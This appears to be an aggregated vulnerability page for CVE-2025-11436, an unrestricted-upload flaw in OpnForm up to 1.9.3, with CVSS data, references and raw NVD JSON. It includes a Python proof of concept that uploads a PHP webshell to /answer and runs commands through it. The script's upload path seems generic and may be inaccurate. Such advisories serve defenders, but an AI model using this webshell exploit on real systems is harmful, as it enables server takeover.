CVE-2025-11436

Description

A vulnerability was detected in JhumanJ OpnForm up to 1.9.3. Affected by this issue is some unknown functionality of the file /answer. The manipulation results in unrestricted upload. The attack can be launched remotely. The exploit is now public and may be used. The patch is identified as 95c3e23856465d202e6aec10bdb6ee0688b5305a. It is advisable to implement a patch to correct this issue.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:jhumanj:opnform:*:*:*:*:*:*:*:* - VULNERABLE

JhumanJ OpnForm <= 1.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11436 - JhumanJ OpnForm Unrestricted Upload PoC
# Affected: JhumanJ OpnForm <= 1.9.3
# Vulnerable endpoint: /answer

import requests

# Target configuration
TARGET_URL = "http://target-opnform-instance.com"
AUTH_TOKEN = "your_auth_token_here"  # Low-privilege authenticated session token

# Malicious PHP webshell payload
MALICIOUS_FILE = {
    "file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

# Form data mimicking legitimate form submission
FORM_DATA = {
    "form_id": "1",
    "field_name": "answer"
}

# Headers for authenticated request
HEADERS = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "User-Agent": "Mozilla/5.0"
}

def exploit():
    """
    Exploit unrestricted file upload vulnerability in OpnForm /answer endpoint.
    Uploads a PHP webshell bypassing file type validation.
    """
    upload_url = f"{TARGET_URL}/answer"

    # Step 1: Upload malicious file to vulnerable endpoint
    response = requests.post(
        upload_url,
        files=MALICIOUS_FILE,
        data=FORM_DATA,
        headers=HEADERS,
        verify=False
    )

    if response.status_code == 200:
        print(f"[+] Upload successful!")
        # Step 2: Access uploaded webshell for RCE
        shell_url = f"{TARGET_URL}/uploads/shell.php?cmd=id"
        shell_response = requests.get(shell_url)
        print(f"[+] Command output: {shell_response.text}")
    else:
        print(f"[-] Upload failed with status: {response.status_code}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11436
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11436
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11436/
[4] VulDB https://vuldb.com/cve/CVE-2025-11436
[5] https://docs.google.com/document/d/1GUjJA9vUbsXUngAv6ySsbCIhVynf8_djardLZYEDOe0/edit?tab=t.0#heading=h.dm5ttliupfqn
[6] https://github.com/JhumanJ/OpnForm/pull/900/commits/95c3e23856465d202e6aec10bdb6ee0688b5305a
[7] https://vuldb.com/?ctiid.327373
[8] https://vuldb.com/?id.327373
[9] https://vuldb.com/?submit.666877

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11436", "sourceIdentifier": "[email protected]", "published": "2025-10-08T06:15:34.883", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in JhumanJ OpnForm up to 1.9.3. Affected by this issue is some unknown functionality of the file /answer. The manipulation results in unrestricted upload. The attack can be launched remotely. The exploit is now public and may be used. The patch is identified as 95c3e23856465d202e6aec10bdb6ee0688b5305a. It is advisable to implement a patch to correct this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jhumanj:opnform:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.9.3", "matchCriteriaId": "C896A041-D9C4-42F0-9477-C57E07D6EFF6"}]}]}], "references": [{"url": "https://docs.google.com/document/d/1GUjJA9vUbsXUngAv6ySsbCIhVynf8_djardLZYEDOe0/edit?tab=t.0#heading=h.dm5ttliupfqn", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/JhumanJ/OpnForm/pull/900/commits/95c3e23856465d202e6aec10bdb6ee0688b5305a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vuldb.com/?ctiid.327373", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327373", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666877", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}